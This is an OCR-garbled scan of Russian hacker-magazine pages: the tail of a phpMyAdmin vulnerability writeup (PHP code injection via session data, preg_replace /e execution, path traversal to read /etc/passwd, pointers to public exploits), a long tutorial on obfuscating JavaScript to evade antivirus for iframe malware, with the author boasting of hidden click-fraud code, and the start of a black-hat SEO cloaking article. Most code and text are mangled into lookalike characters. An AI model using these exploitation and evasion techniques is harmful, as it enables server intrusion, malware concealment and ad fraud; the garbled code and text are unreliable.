гефигп $с; 
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И что же мы видим? Массив $с извлекается из$_ 5Е55ОМ, над которым 
мы имеем полный доступ, благодаря багу, рассмотренному ранее. Таким 
образом, мы можем записать в файл сопЙа/сопйа/пс.рВр произвольный 
РНР-код, который выполнится при его просмотре! 

Переходим куязвимости номертри. Вотинтересные строчки из файла 
ъегуег_вупспгогихе.рйр: 


466: $%ге_46 = $ $Е$ЗТОМ[ '4гР_96']; 
477: Фипсоттоп_%аб1е$ = $ $ЕЗЗТОМ[ " ипсоттоп_\аб1е$']; 
674: РМА_сгеафеТаггееТа61е$ ($гс_а6, $Ег=_аб, $згс_11пк, 


$Егв_ 11пК, Фипсоттоп_Фаб1ез, 
фипсоттоп_Фаб1е_5Егисиге_а1+1+[$$], 
фипсоттой_{аб1ез_#е14$, а15е); 


Функцию РМА_сгеа{еТагае{Тае$ можешь посмотреть на со- 
ответствующем рисунке. Видно, что переменные Фипсопптоп_ 
{аб (ез[$4а {е пех] и ${га_Ч6 извлекаются из уже знакомого нам 
массива $_5Е551ОМ. Используя уязвимость, описанную ранее, 


ты можешь записывать все что душе угодно в первый и второй 
параметры функции ргед_гер[асе, находящейся на строках 627-631. 
Например, мы можем использовать модификатор «е» в шаблоне 
регулярного выражения, тем самым, исполняя второй аргумент 
функции как РНР-код. 

В этом баге есть два неприятных момента. Первый: если на сервере 
установлен патч ЗиВозт, то ничего не будет работать... Второе: нужно ау- 
тентифицироваться, прежде чем мочить в этот баг, иными словами знать 
логин и пароль какого-нибудь пользователя БД. 

Наконец, мы дошли до последнего, четвертого бага. Рассмотрим файл 
ЦИбгачез/Ч1ер(ау 4ЬСИЬ.рбр, строчки 1291-1299: 


1+ ($6.ОВАЕЗ[ ' сЕ=Ве1а®1оп' ] [ 'м1темогК'] && 
$СЕОВАЕ$ [ ' СЕ" ] [ "ВгомзеМмТМЕ ' ]) 


1+ (155е%($61ОВАЕЗ [ 'т1те_тар' ] [$тефа->пате ] [ 'п1мефуре' ]) && 
155е1 ($СЁОВАЕЗ [ 'м1те_тар' ] [$тефа->паме ] [ "ЕгапзФогта1оп' ]) && 
!етр®у ($6 ЕОВАЕ$ [ 'т1те_тар" ] [$тежа- >паме ] 'Егап$Фогта1оп' ])) 
{ 
$1пс1иае_Я1е = 
$СЕОВАЕ$[ 'т1ме_тар' ] [$тефа->пате ] [ "Егап$Фогта1оп' ]; 


1+ (А1е_ех1$$('./116гаг1е5/{гапФогта1оп$/'. 
$1пс1иае #А1е)) 
{ 
$Егап$РогтРипс1оп_пате = 5г_гер1асе('.1пс.рИр', '', 
$СЕОВАЕ$ [ 'п1те_тар' ] [$тефа->пате ] [ 'ЕгапзФогта*1оп' ]); 


геди1ге_опсе 
'./116гаг1е$/+гап$Фогта*1оп$/'. $1пс1иае_#1е; 


В вызове геашге_опсе используется переменная Фипсшде_Ще, 
которая определяется через массив $С1ОВАЕ5, доступный для ре- 
дактирования на стороне клиента. Например, присвоив переменной 
$СЕОВАЕ5 [ 'п1те_тар' ] [$тетжа- >пате ] [ 'ЕгапзФРогта1оп' ] зна- 
чение «../../../../../../е{с/раз$м/4», мы увидим содержимое файла /е{с/ 
раза. Косяк лишь втом, что этот багтакже требует аутентификации. 
Наехро©(-аБ6.сот лежат два эксплоита под это дело, ихномера 1'7510 и 
17514, дерзай! 


ЦАЗЯЗЕ) 
рЮрМуАдгпит < 3.3.10.2 |] рАрМуАдгит < 3.4.3.1 


Прокачать рирМуАагтпит до последней версии. = 
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э Обфускация — это приведение исходного текста программы к виду, 
сохраняющему ее функциональность, но затрудняющему анализ, 
понимание алгоритмов работы и модификацию при декомпиляции. 
Применительно к/]ауазсир{ данная технология используется в таких 
видах теневого онлайн-бизнеса, как загрузки (!гате), спами 5ЕО. 
Наша задача на сегодня — изучить все методы скрытия /5-кода, 
которые, я надеюсь, ты будешь использовать только во благо. 


Теория 


Во-первых, ответим сами себе на несколько вопросов: 

1. Что будем прятать? 

Прятать будем только клиентскую часть меб-приложений, то есть 
то, что в конце концов загрузит к себе на компьютер обычный 
пользователь. 

К этому типу можно отнести следующие технологии: 

® НГМЕ-код страницы; 

® Лауабсгр{-код//5-файлы страницы; 

® С55-код/С55-файлы страницы; 

® Изображения и другую информацию [только в браузерах, поддер- 
живающих протокол «Ча{а»). 

2. От кого прятать? 

Прятать всю эту информацию резонно от: 

® антивирусов (если речь идет об Игате или других вредоносных 
скриптах}; 

® других людей (например, если ты написал чудесный скрипт на 
]ауаб ст ри и не хочешь, чтобы кто-то его «содрал» себе). 

3. Насколько можно быть уверенным в безопасности скрытой 
информации? 


> 050 


Уверенным быть нельзя. 

Почему? Потому что вся информация, которую загружает поль- 
зователь, все равно выполняется браузером. Это значит, что 
даже если закриптовать/скрыть информацию очень сложным 
способом, это не будет означать, что твой код нельзя будет про- 
читать. Прочитать будет можно в любом случае, ты сможешь лишь 
затруднить это чтение. Как раз об этих способах затруднения мы 
и поговорим. 

4. Как происходит процесс криптовки/обфускации в принципе? 
Тут есть два различных этапа: создание обфусцированного/крип- 
тованного кода и его расшифровка для нормального выполнения 
браузером. Генерировать обфусцированный код мы будем с помо- 
щью РНР-скриптов, хотя делать это можно с помощью чего угодно. 
А вот расшифровку выполнения кода нужно писать на ]ауа5стр*: в 
этом случае скрипт, по сути, расшифрует и выполнит сам себя. 


Базовое шифрование НТМ!/С55 


Что делать, если нам нужно зашифровать НТМ(- или С55-код? Все 
просто: зашифровать на ]ауа5спр\у, а после расшифровки вставить 
как НТМ(-код. 
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Обфусцированный скрипт 
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Е, __ ме рае и. ПИТаци. = пиши Гра СД а ши Г г. _ МЕРЕ, жареные | Са ы 
№ Лаз 1 ЮО. в =_ Е М № _КИТЕЙ: «бы Вей рб = 
[| ГГ Г. м |. й. И О ТЕ ет Н.В Ге. ВВВ, ЕЕ РЕВ. __ ВЕбЫВИ 
.{. _й ий Зее Е вы - =. ЕЕ мере | Г. 2} Рыб рые Е. ты. в 
ай ай _ Ин _ эму. _ = ==. _В_=Вый И р В Ат вый _ вв $. я 
в. И. И и. ИТЕАТ в „== Е „пы АИ, =. и ев. „= Не „№4. 
+. “а ТГ М МЛ И 
| 
ты, 
== |1 
ыЕш] 


Пример вставки (без шифровки/крипта/обфускации]: 


<Ит1 > 

<5сг1ре> 

уаг Ит1 = '‹сепфег><И3З>Пример хтмл-кода</П3> 

</сепфтег>'; // кидаем в переменную "П{т1"-код, 

который хотим вставить 

доситепЕ . вет Е1етепе$ВуТаяМате ( 'Вт1')[9]. 
1ппегНТМЕ = И%т1; // вставляем между тегами 

<Ит1> и </Ит1> 

<АЗСРТрЕ> 

</Пфт1 > 


Точно так же мы поступим и с С55$-стилями: 


<Пт1> 

<5сг1ре> 

\уаг с$$ = 'Боду{тагё1т:@рх; }.5и6с1{раЯ91п8:5рх;}'; 
// кидаем в переменную "с55" код, который 
// хотим вставить 

доситепЕ . ветЕ1етеп&$ВуТаяМате ( 'Вт1')[9]. 
ТиппегнтМЕ = '<5$у1е>'+с$$+'</5$у1е>'; 
// вставляем между тегами <Пт1> и </Пт1> 

ЗАБЕГЕ > 
</Пфт1> 


Теперь постараемся абстрагироваться от НТМЁ и (5$ и 
поговорить только о самой сути — сначала скрытии, а 
затем и криптовке /ауа® стр. 

Прежде, чем кто-либо захочет посмотреть и расшифро- 
вать наш код, он постарается его найти. Ниже ты най- 
дешь несколько действенных методов сокрытия кода от 
глаз любопытных пользователей. 


Замена ат ибутов 
тега <$сп 


Все очень просто, но это нельзя считать хорошей или 
даже средней защитой, так как она ориентирована на 
невнимательность пользователей. 

Сам принцип донельзя прост. Мы имеем страничку 
(«шпаех. Вит») и ]ауабсгр{-файл, код которого мы хотим 
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скрыть («$сг!р\.|5»]. На странице «!паех.ВтЦ> у нас 
указано: 


<5сг1ре фуре="{ех*/]ауа$сг1р*" 
РС". И сгарЕ. 5 >< /5сгарЕ> 


А теперь просто создадим папку «ех{», в которую поло- 
жим наш скрипт («$сг!р1.|5»] под именем «ауазсгр\» и 
поменяем атрибуты местами. Это будет выглядеть так: 


<5сг1ре згс="фех{/)ауазсг1 ре" 
вуре=”./эсгарЕ. 5 › < Лзсваре > 


Для лучшего эффекта сразу отвлечем внимание поль- 
зователя на путь. Например, так: 


<5сг1ре згс="фех*/)ауазсг1ре" фуре=" Пр: //Во$*. 
сот/очень/длинный/путь/который/ сразу/бросится/в/ 
глаза/сг1ре. 5" ></зсг1р> 


Проверено на личном опыте: работает отлично! 
Таким способом я сам накручивал партнерку по кли- 
кам, так как пришлось использовать накрутчик на 
]ауа5сг!р*. Администрация партнерки его так и не 
увидела :]. 


лауаъсир!-обработчики 


Данный способ также не является универсальным 
средством для сокрытия /5-кода, но все же я расскажу 
о нем. Главная идея состоит в том, чтобы прятать код 
внутрь обработчиков событий оп[оа9, опСИсК и т.д. То 
есть примерно в следующие конструкции: 


<Боду опГоад="а1ег*(1);">< /Боау> 
<Фехфагеа опС11сК="а1ег*(1);">< /Фехфагеа> 


Например, для тегов Боду и гатезе{ есть обработчик 
опГоа4а, который запустит в нем прописанный код после 
загрузки страницы/фрейма. 

Отмечу, что не для всех объектов обработчики одина- 
КОВЫ. 


СооКе, Кететег и адрес 


]ауа5спр* можно также спрятать и в такие нестан- 
дартные места, как сооке (досиптеп".сооКк!е}, реферрер 
([Чосиппеп\.гееггег] и адрес страницы (юсайоп.Вгей. В 
данном случае код будет храниться как обычный текст, 
а выполняться с помощью функции еуа(], которая 

берет в качестве аргумента текст и выполняет его как 
]ауа5спр(-код. 

В качестве примера примем такое допущение, что у нас 
уже установлены кукисы следующего вида: 


соокК1еуа1ие=| |а1ег* (1); | | 


Теперь выполним этот алерт следующим образом: 


<5сг1рЕ>е\уа1 (ипезсаре ( аоситеп{ .соок1е). 
о) Иесетрь > 


[НТТР://ММИМ 


› ИпК$ 

® [ауазсгирфобТизса- 
{огсогп — неплохой 
паблик обфускатор. 

® {Е-8.[р/риБИс/Деп- 
соде.Втп( — ориги- 


нальный японский 
криптер. 

® Чеап.е\/ага$. 
пате/раскег — пакер 
ламазспру. 

® |БеацИНег.ога — 


делаем код читаемым. 


| 0\У0 


› ЧУЧ 

На нашем дискеты 
найдешь подробный 
видеоурок по всем 
приемам обфуска- 
ции Чауа5спр\ кода, 
описанным в данной 
статье. 
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| име з@ 4 ЕЕ Ш т 1 
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ы 
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Прячем слово «Г[аКер» в теле документа 


Здесь мы берем текст всех сооК!е-записей для нашего хоста и 
делим его на части в местах, где стоит «||». Затем берем второй 
элемент [[1]] и запускаем его через емаЦ]). 

Данный способ не так уж и плох, так как код, который мы хотим 
исполнить, не виден на самой странице, а также потому, что мы 
можем заставить код удалить самого себя! Пример реализации: 


<?рир 

// ставим в куки Зауа$сг1р*-код + код удаления (замены на 123) 
сефсоок1е('соок', ' | | а1еге (1); доситепт*. 
соокте="е69к=123": ||). 

Ро 


<5сг1рф> 

// исполняем код и удаляемся 

е\уа1 (ипезсаре (аоситеп* .сооК1е).$р114('||')[1]); 
7 5егарЕ> 


Аналогичным образом можно использовать и другие строки, доступ- 
ные через /]ауаЪсг!ре, например, [оса{оп.ПгеЁ и досигптеп(.гееггег. 


Сокрытие кода на Аах 


В данном случае код будет находиться в отдельном файле, а его 
запуск будет осуществляться с помощью чтения этого файла и 
выполнения его содержимого функцией еуаЦ). 

Нам понадобится составить страницу со скрываемым кодом, а 
также страницу с функцией запуска этого кода: 
1.Страница с кодом, который мы хотим скрыть [с именем «[»}: 


а1ег* (1); 


2.Страница с вызовом кода: 


<$сг1ре>РипсЕ1оп х(){Егу{гефигп пем ХМЕНЕ&рКедие$*(); } 
сафси(е) {+гу{гефигп пем АсЕ1уехОБесе ( "М$хт12.ХМЕНТТР');} 
саесН(е) {+гу{гефигп пем АсЕ1уехоБес* ( "М1сгозоЕ. 
ХМЕНТТР') ; }саЕсп(е){гефигп пи11;}}}}; РипсЕ1оп 

у(){маг 2=х();11(2){2.ореп('рее’,'./1');2. 

опгеаду афесНапве=РипсЕ1оп(){1+(7.геаду$а*е==4){е\уа1 (7. 
гезропеТех{); }};7.5епа(пи11);}};у();</зсг1рЕ> 


Данный метод скрывает код в отдельном файле [в нашем случае 
«|>]. Конечно, можно найти путь файла и открыть его, но при обфу- 
скации подобного кода найти имя файла достаточно трудно. 


Нуллбайт атакует Оперу 


Этот метод прост и достаточно эффективен, но, к сожалению, 

он рассчитан только на браузер Орега. Суть метода в том, чтобь 
перед скрываемым кодом поставить так называемый нуллбайт 
[нуллбайт или пиуЦБУе — это символ с АЗСИ кодом «0»]. Зачем? 
Затем, что Орега просто-напросто не показывает код во встроен- 
ном просмотрщике после данного символа. Пример: 


<И{т1>тут какой-либо код</Пт1> 
<?рПр еспо(сйг(9)); ?> 
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Работа обфусцированного алерта 


<5сг1ре>а1ег*(1); /* этот код мы скрыли */</5сг1рЪ> 


В данном примере сначала идет нормальный код, который нам 
скрывать не требуется. Потом с помощью РНР мы вставляем нулл- 
байт, а после него идет скрываемый код. 


Прячемся в НТМ!-коде 
и комментариях 


Код можно легко спрятать в НТМЕ, затем обработать его и выпол- 
нить. Например, вот так: 


<БоЧу><1Ме 5вс=". /БтсЕ. ре" а="а1" Б=“ев“ с=" (т); "></Боау> 
<5сг1рЕ>а = доситеп* .Боау .1ппегнтТМЕ; еуа1(а.$р11{*('а="') 
[ЕТС ро ва, сое Ь-]. 5ттЕС "п [@Еа. 
СЕ = [Е [Е < ЗЕРТЕ _ 


В данном случае мы спрятали код в атрибутах тега тд, после чего 
обработали код всей страницы, собирая разбросанные кусочки. 
Таким же способом можно скрывать текст в НТМИ/Чауа5 сг!р* ком- 
ментариях: 


Комментарий на НТМЕ : 

<!-- а1ег*(1); --> 
Комментарий на Зауа$сг1р*: 
// а1егЕ(1); 

А атегЕил 


Отдельно стоит отметить, что очень эффективно можно прятать код 
внутри популярных фреймворков — например, |Фчегу, пооТоо(5 

и подобных. Эти файлы не являются подозрительными, а иссле- 
дование их займет много времени (хотя всегда существует воз- 
можность автоматического сравнения оригинала и измененного 
файла]. 

Теперь же, думаю, можно поговорить о том, что, в конце концов, 
видит эксперт безопасности, и о том, что исследуют антивирусы. 
Ниже читай о наиболее популярных методах криптовки и обфуска- 
ции /5-кода. 


ТО ОЧ 


Данный метод ориентирован на то, чтобы вместо стандартных 
функций или методов /ауа5стр* подставить свои переменные: 


До субституции: 
<5сг1рЕ>аоситеп* . вееЕ1етепЕВуТаеМате ( "Пт1") [9] .1ппегНТтМЕ 
= доситеп* . везЕ1етепе$ВуТаёМате ( "Боду") [9] .1епё*п; 
сУЗеРир» > 

После субституции: 
<5сг1рЕ>а=доситепт ; с= ' вет Е1етеп*$ВуТаёМате ';а[с] ("Вт1"). 
1ппегНТМЕ = а[с] ("Боау") [9].1ппегНТтМЕ .1еп8 И; </зсг1ре> 


В данном случае мы заменили объект «доситеп{» переменной 
«а», а метод деЕ етеп{ВуТачМате переменной «с». Следует 
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аа. раса на Басни" Пвиоии роки рома Кори косе Бо и 
Гаваи Биты ииетиинлит = 
ПЕНЫ ыдвви- р нии вы. 


Госу м мы 


Зиртеы | с са 
= НЯ за = 
а ава ы тан 
ее п роде 2-Я С ВД ВИ "ЛВ 
ии т И а ба. 
н — Я еее 
== == 


Делаем скрипт читаемым 


заметить, что методы (то, что начинается точкой, например, 
Депо{А или .де{Еетеп{ВуТадМате) можно также заменять 
определением ключа в массиве [если рассматривать объект как 
массив]. Если у нас есть объект «доситегц», а в нем есть элемент 
де{Еетеп(ВуТадМате, это означает, что мы может вызвать его 
двумя способами: 


1) доситеп* . вееЕ1етепВуТаёМате 
2) аоситеп* [ 'вефЕ1етеп*$ВуТа?Мате ' ] 


Из этого следует, что во втором способе мы используем строковые 
данные («де Е етеп{(ВуТадМате»}, следовательно, их можно 
заменить на переменную, содержащую в себе строку — название 
метода. 

Субституция полезна в случае частого использования одного и 
того же стандартного объекта/функции/переменной. Это сильно 
меняет код, а также сжимает его. 


Флуд комментариями и кодом 


Данный способ рассчитан на то, чтобы вставить в обфусцируемый 
код флуд, то есть что-то, что не несет смысловой нагрузки для 
кода скрипта. Флудить можно как код, так и комментарии: 


Флуд комментариями: 

<$сг1ре>/* рОТЕР@брмк@13Рв */ а /* Рарткб13Р#5щевр */ = /* 
тКС13Р8 */ "ПаПаПа' /* рОТЕЛЗР& */ ; /* мерЕбой */ а1ег{ /* 
о1мбо1егпрег */ ( /* 1вмергеог! */ а /* имбпропгПК */ ) /* 
Чиротерй “/; /* гозиерРо. '/<ЛзесарЕ> 

Флуд кодом: 

<5сг1р®> мео16ов = 'вмгобэоегй'; а = 'Папайа'; БйопьЬ = 
'иоеоР1омер'; а1ег*(а); 


В данном случае флуд комментариями слишком плотный, хотя на 
самом деле код был очень простым: «а = «Вавара»; а(ега);>. 
Флуд кодом можно также мешать с флудом комментариями. При 
желании можно написать РНР-функцию для добавления флуда в 
код /ауа5сг!рт. Лично я брал какую-то статью с английского блога, 
парсил на слова, и функция добавляла случайное количество этих 
слов в комментарии. 

Кстати, желательно также использовать многострочные коммента- 
рии в форме «фальшивого закрытия»: 


д) атегЕ(т); /*/ а1ерЕ(2); /*/ атерЕ(3); д*/ 


Какое из чисел покажет алерт? :] 


Замена текста 
шестнадцатеричными кодами 


Я хотел отнести к этому пункту и кое-какие другие способы преоб- 
разования текста, но оставил только этот, так как это единствен- 
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Тип: )5с1р& $спрЕ Ре 
Изменен: 04,07,2011 18:43 
Размер: 19,3 КБ 


ОБ гам. 


Тип: )5спрЕ 5спр* Рйе 
Изменен: 0$4,07.2011 18:44 
Размер: 7,16 КБ 


Разница в размерах скриптов до и после обфускации 


ный способ шифровки, не требующий функций-помощников для 
расшифровки: 


<$сг1рф> а1ег* (доситеп* [ "\хб3з\х6Е\х6бЕ\х6В\х69\х65"]); 
< 5сгтрЕ> 


В данном случае мы — во-первых, использовали внутреннюю 
переменную «сооке» объекта «Чосигтег{», как элемент массива. 
Во-вторых, мы перевели ее имя в шестнадцатеричный формат. 
Если бы мы использовали переменную «сооке» через точку, то 
есть как дЧоситеп{.сооке, то мы бы не смогли перевести обра- 
щение к ней в шестнадцатеричный формат, так как это относится 
только к строкам [в массиве ключ является строкой], а в доситеги. 
соок!е строк нет. 

РНР-функция перевода в шестнадцатеричный формат: 


<РрИр 
ФипсЕ1оп сезсаре($$) 
{ 
Фогеасй (5%г_$р11*($$,1) аз $5ут) 
{ 
$4 = деспех (ога($5зут)); 
Фе] = Сетей ($9) == 1) 0’. а: Фа; 
| 
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ребига (‘х’.‘\\’. чиртоде( ‘Хх’. \\’, 55): 
} 


2> 


Трюк с несуществующими 
ункциями а 


Как мы уже знаем из прочитанного выше, в ]ауа5стр* 

можно вызывать методы, как элементы обьекта: доситеп\. 
деЕетеп{Ву!9 и доситеп Где Еетеп{ВУ!а']. Оба варианта фак- 
тически одинаковы, различие есть только в записи — во втором 
варианте мы используем строку. 

Как-то вечером я придумал очень интересный способ получения 
подобных строк. Например, нам нужно зашифровать вышеупо- 
мянутый «де{Еетеп{Ву!9». Отвлечемся на короткое объяснение 
данного способа с помощью такого примера: 


СЕБЕ а = В (549), < АЗСЕТЬЕ> 


Этот скрипт не будет работать, так как функции Б, си Ч не были 
ранее объявлены. Теперь попробуем сделать так, чтобы этот код 
заработал, для этого будем использовать «песочницу» конструк- 
ции {гу{са{ев ($: 


<5сг1р*> Егу{а = 6(с(4()))}саесп(е){а1егЕ(е);} </зсг1ре> 


После запуска мы увидим ошибку, а это значит, что, хоть код и 
не является рабочим, он не остановил выполнение оставшейся 
корректной части. 

А вот теперь мы зададимся вопросом, как такая схема может 
быть связана с шифрованием строки «де Еетег{Ву!а»? 

А вот так: 


<5сг1ре>тгу{ (ветЕ (1ете(пЕВ(ута()))))}саЕсв(е){х = (е+'"). 
ТЕ”), 115) тои ЕР: Е> 


После выполнения этого кода у нас получится строка 

«де Еетеп{Ву!4», содержащаяся в переменной «х». 

В чем соль этого метода? В том, что эвристический анализ анти- 
вирусов при нахождении функций будет ругаться на то, что они 
не существуют. Тем самым мы обфусцируем код не на уровне 
шифровки строк разными способами, а на уровне получения дан- 
ных строк от самого У]ауаЪ стра. 


Числа с помощью оператора «-» 


Оператор «-» [тильда] является битовым отрицанием и использу- 
ется вот так: «а(ег{(-13]:». Этот код выведет нам «-14». Работает 
данный оператор по принципу «-[число+1}». 

Представим, что мы хотим присвоить переменной «а» какое- 
нибудь число, причем нигде это число не писать: «а = -[»; 
Данный код присвоит переменной «а» число «-1». Почему? 
Потому что массив представляет собой нейтральный элемент 

с числовым значением «0», следовательно, -0 равносильно 
«-[0+1)», то бишь -1. 

Примеры других преобразований: 


Е 

Е 

Ви © 

о 

= гие; // -2 

= —а15е; // -1 

= -^[]*(""+->[]+-м-м-м-м-м[]+-м-мгие); // 153 


руквы и строки 
3 строковых данных 


Иногда требуется получить букву/символ или какой-то текст без 


|“ «О « о < «о ВИ И « 
И 
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его явного написания. Сделать это позволяет одна особенность 
]ауа5спри. В этом языке существуют различные внутрисистемные 
сообщения, которые можно преобразовать в текст, а затем этот 
текст обработать. 

Например, представим, что нам нужно получить текст «сойе». 

Эта строка содержится в именах таких методов, как спагСодедА(), 
КогСрагСо4де!} и других. Получить текст можно следующим 
образом: 


а = (а1еге+' ').5р11%("1\е ")[1].5ч65%г(0,4); 


В данном примере переменная «а» будет содержать текст 
«сое». Разберем подробнее. Попробуй исполнить вот такой 
код: «а(ег(а(ег(+”);». Ты увидишь что-то вроде «ипсНоп а(ег{(} 
{ паНуе соде] }». Тем самым, использовав всего-навсего 

два раза функцию а(ег{(), мы получили совершенно другие 
символы. 

Теперь постараемся понять, как это все работает. Представим, 
что у каждого объекта, функции и всего остального в Лауа5$сг!р\ 
есть некое «описание». Чтобы получить к нему доступ, нужно 
явно изменить тип данного объекта или функции на строковой, 
присоединив, например, пустую строку [+»»). 


[Шифровка строк 


Для шифровки/расшифровки строк в Лауа5стр{ существуют 
несколько полезных функций. Разберем некоторые из них: 


езсаре(); // шифрует строку как ЦВЕ 
ипезсаре(); // дешифрует УВЕ -строку 
епсодеувТ(); // шифрует строку как УВТ 
десодеукт(); // дешифрует УКТ-строку 


Также есть два метода объекта 5{ппд, которые работают с преоб- 
разованием символа в АЗС|-код и наоборот: 


5$1г1п5.+готСПагСоде (97); 
БЕ" спагсоаель( 


[9] 
| 


Стоит учесть, что строки можно преобразовывать еще и регуляр- 
ными выражениями в сочетании с методами ‚па{сй и ‚гер(асе. 
Другие методы можно отнести, скорее, к поиску по строке. 


Преобразование 

объекюв переменных 

Имена объектов и переменных можно также преобразовать 

в строку [например, чтобы потом эту строку зашифровать). 
Преобразование происходит по тому же принципу, что и пре- 
образование имен методов, то есть с помощью перехода из 
формы «.метод» в форму «[метод]». Для корректного преоб- 
разования нужно найти еще более высокий в иерархии объ- 
ектов элемент, который бы имел внутри себя слово «доситет». 
Имя ему {В15. Согласно стандартам /]ауа5спр\, {61$ не является 
объектом, а является оператором, возвращающим ссылку на 
объект. В результате теперь мы можем безболезненно исполь- 
зовать де{Еетеп{Ву!4 таким образом: «{!5[«4оситеп>] 
[«деЕетег{Ву!а»]». 


Привязка кода 


Иногда возникает необходимость написать код так, чтобы он 
выполнялся только после соблюдения некоторых условий. 
Например, мы создали /]ауа$сг!р\-код и хотим его продавать, но 
продавать мы хотим с привязкой к домену, чтобы его нельзя было 
запустить на других сайтах. 

Еще раз повторюсь: никакой абсолютной защиты не придумать в 
принципе, есть лишь некоторые способы, затрудняющие процесс 
копирования/отвязки. 
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Вот несколько типов таких привязок + данные, от которых они 
эзавися! Г: 


» привязка к домену // Тоса1оп.Игеф. $р11%('/')[2]; 

» привязка к параметрам (передаются странице после #?) // 
Тоса{1оп.Пгеф. р11%('#')[1] или 1Тоса1оп.Пгеф+.зр11%("'?'). 
$11се(1); 

» привязка к дате // а = пем Ва*е(); 

» привязка к коду Зауа$сг1ре // <5сг1ре 14="] зсоае">а = 
доситеп{ . гетЕ1етепЕВуТа( ']5соае').1ппегНТМЕ ; </зсг1рЪ>; 
» привязка к коду всей страницы // а = доситеп*. 
зе+Е1етепЕВуТа?Мате ( "Ит1") [9] .1ппегНтмМЕ; 

» привязка к браузеру // а = па\1вафог.изегАвепт; 

» привязка к куки-записям // доситеп* . соок1е; 

» любые другие привязки, которые можно придумать. 


Избегание . 
подозрительных функций 


Советую также избегать явное использование функций еуаЦ], 
Чоситепе.мигКе!} и других. При поиске настоящего кода люди часто 
используют метод подстановки а[е{{(} вместо данных функций, так 
как после этого код можно сразу прочитать таким, каким мы его 
начинали шифровать, следовательно, весь смысл обфускации про- 
падает. Как же выполнить код, не используя фунцкию е\ма[]? 
Вспомним про то, что во главе всего стоит оператор {В 1$. С помо- 
щью него функцию еуа(] можно превратить вот в такой код: 


а = 611 5[ `\х65\х76\х61\х6ЕС "|. 


После такого преобразования мы спокойно сможем использовать 
«а(]» вместо «еуа(]». 


Изменение 
на нечитаемые строки 


В обфусцированном коде следует использовать следующие сим- 
волЛы И их комбинации ДлЯ обозначения идентификаторов: 


1) о. о а“ 
2) ле ег. ГЕ фе 
3) "_" (и варианты "__", " а) 


4) "$" (и варианты "$$", "$$$" ...) 


После использования подобных символов код становится крайне 
трудночитаемым, особенно если его сжать, убрав лишние пробе- 
лы и переносы строк. 


Шифрование кода 


Способов шифровки текста существует неограниченное коли- 
чество, хотя все они основаны на использовании каких-либо 
текстовых/числовых функций. Часто работает конструкция: еуа({ 
+ функция _расшифровки(} + шифрованная_строка. Попробую без 
лишней воды показать один из таких способов. 

Допустим, нам нужно зашифровать строку «а(ег(1]:;». Мне при- 
шло в голову брать по два символа из нее, переводить их в 
числа (АЗСИ код], считывать их и рядом ставить первый символ в 
чистой (без перевода] форме. Только стоит учесть, что, разделяя 
код на такие двухбуквенные части, мы получим код примерно 

в 2-2,5 раза больше оригинала, а также нельзя забывать, что 
такие блоки лучше как-то разделять [как элемент массива или 
через разделитель}. За разделитель возьмем знак «%», так как 
он делает шифрованную строку похожей на УКГ-строку. Напишем 
простой РНР-скрипт: 


<?рИр 
фа = "а1егЕ(1);"; 
Фа сера 2): 
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ЕЕ“? 
фогеасН ($а аз $м) 
{ 
фе .= '%'. $%\[90] . (ога($\,[9])+ога($\у[1]1)); 
} 
еспо($е); 
?> 


Вот что у нас получилось: «Жа205%е215%{156%190%;59». 
А теперь напишем дешифровщик этого кода на ]ауа5сптрё: 


ФипсЕтоп 4($) 


{ 
= 65. Е’). 5 1тсе(е) 
Е’. 
Фог (1=0; 1 < $.1епёН; 1++) 
{ 
с += $[9] + 5&г1птяа. ЕготСВагСоае ( 
5.5и65{г(1)-5[09].сНагСодед*()); 
} 


гефигп с; 


Вызов кода в таком случае будет выглядеть так: «еуа1 (а('%а205 
%е215%%156%190%;59')) ;». 

Теперь остается только немного обфусцировать весь этот скрипт. 
Мы не будем использовать все описанные методы, а затронем 
лишь некоторые из них: 


2 = '73706С697421736С696365216С656Еб774682166726Е60436861 
72436Е6465217375627374722163686172436Е64654174'; 


— ' ' ® 
у 5 


фог(__=9; _<2.1епвВ/2; _++){_+=ипезсаре( '%'+2[__*2]+2[_ 
Е 
Е Во ВВ 
В о 
И В ва 
ОЕ В ео 

{01$[ '\х65\х76\х61\х6С' | (____('%а205%е215%%156%190%;59')); 


Рассмотрим подробнее процесс работы этого на первый взгляд 
нечитабельного кода: 
и: 
Здесь переменной присваевается текст, который был получен 
переводом строки р !5ИсеЦепаПИготСвагСоде!5и6 г!свагСо@9 
еД{ в шестнадцатеричны вид (\х73\х70\х6С\х69\х74...] без «\х»; 
Е.) 
Тут мы переводим обратно эр! !5Исе Цепа{В ИгогпСВагСоде!5и6{"! 
свагСодеА{ в переменную «_»; 
Зе): 
Разделяем строку в тех местах, где есть символ «!»; 
д. ГиИеЕто ще... } 
Описанная выше функция 9} в обфусцированном виде; 
5. Ет5 [| \х65\х76\ хе хбр, 
Декодирование строки и запуск кода. 


Напоследок 


Ну что ж, подведем итоги. При комбинации всех этих способов 
можно быть на 100% уверенным, что простой или даже средний 
пользователь не сможет прочитать или скопировать к себе твой 
код. Но так как специалисты по компьютерной безопасности пре- 
красно знают о большинстве данных трюков, а также потому что 
я выкладываю эту информацию на всеобщее обозрение, могу 
предположить, что данные методы станут более популярными и 
известными. Я надеюсь, что ты сможешь использовать представ- 
ленную информацию в благих целях. == 
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Клоакинг 
как средство 
выживания 
В ПОИСКОВЫХ 
системах 


® Наверняка ты не раз слышал такое загадочное слово, как клоакинг. 
Обычно его используют при общении на черных оптимизаторских 


форумах люди со статусом «ТопМастер». Сам по себе статус 


топмастера подразумевает очень приличный заработок на поприще 
эЕ0. Сегодня мы попытаемся понять, каким образом связаны 


приличные суммы американских президентов и применение 


технологий клоакинга при создании дорвеев, а также разберем всю 
сущность этого метода поисковой оптимизации в текущих реалиях. 


Матчасть 


Клоакинг — это «черный» 5ЕО-прием, который использу- 
ется дорвейщиками для того, чтобы выдавать различную 
информацию на одной и той же странице поисковику и 
пользователю. 

Ты спросишь, для чего нужно такое разграничение? 

Очень просто. Применение данной технологии позволяет 
существенно увеличить время жизни страниц, нацеленных 
на быстрый сбор трафика (дорвеев). Теперь давай немного 
углубимся в суть клоакинга. Итак, допустим у нас есть спе- 
циально подготовленная страница, в которой мы приме- 
няем клоакинг. При заходе на такую страницу поисковый 
робот увидит специально оптимизированную пагу, где ему 
не будут видны редиректы, баннеры и другие промомате- 
риалы, к которым поисковые машины относятся крайне 
негативно. Пользователь же может увидеть два типа стра- 
ниц: страница для пользователя («серчера»], пришедшего 
с поисковика и страница для всех других пользователей, 
не попадающих под определенные условия. В первом 
случае пользователь видит страницу с промоматериалами, 
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ссылающимися на предмет его поиска, и не видит всей 
